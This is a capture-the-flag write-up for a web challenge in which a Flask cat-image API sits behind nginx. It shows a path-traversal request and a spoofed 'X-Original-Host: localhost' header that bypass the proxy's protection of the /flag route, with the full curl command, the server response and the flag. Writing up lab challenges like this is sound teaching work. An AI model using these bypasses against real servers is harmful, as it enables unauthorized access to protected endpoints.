Description

Some powerful proxy protects our cat factory production bay, but the strange thing is that we edited some nginx config in the platform to protect our /flag route, and things do not look as secure as expected.

Flag format: ctf{sha256sum}

Preambule

We can access a website that show us cat images generated via an api.
Analyzing source code, we can see that the endpoint for the cat “factory” is located at /api/data/cat.

Analysing

Handly fuzzing some parameters here, we got some trange response when accessing /api/data that tell us to pass ?host=xxx in the url.

When passing our own host, we got remote connection from the flask app, telling us some headers like X-Real-Ip, X-Forwarded-For and X-Original-Host.

After a lot of trying… like trying to redirect to flag from our server, we ended up trying other things…

By trying url like /api/data/cat../../../flag, we can see that we can access flask app behind nginx without access being denied o/

But we got an error because we are not accessing it from localhost:5000…

Remember the header getted previously from flask? We tried to set X-Remote-Host to localhost and then…

Resolution

$ curl -vvv http://34.159.76.217:32222//api/flag -H 'X-Original-Host: localhost'
*   Trying 34.159.76.217:32222...
* Connected to 34.159.76.217 (34.159.76.217) port 32222 (#0)
> GET //api/flag HTTP/1.1
> Host: 34.159.76.217:32222
> User-Agent: curl/7.81.0
> Accept: */*
> X-Original-Host: localhost
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.18.0 (Ubuntu)
< Date: Sat, 28 Sep 2024 17:45:05 GMT
< Content-Type: application/json
< Content-Length: 113
< Connection: keep-alive
< 
{"flag":"ctf{89b52b00fd39c0410372b898632e6bf0648ae9f43d500762d03af9e7768bcbfd}","request.host":"localhost:5000"}
* Connection #0 to host 34.159.76.217 left intact

The flag was: ctf{89b52b00fd39c0410372b898632e6bf0648ae9f43d500762d03af9e7768bcbfd}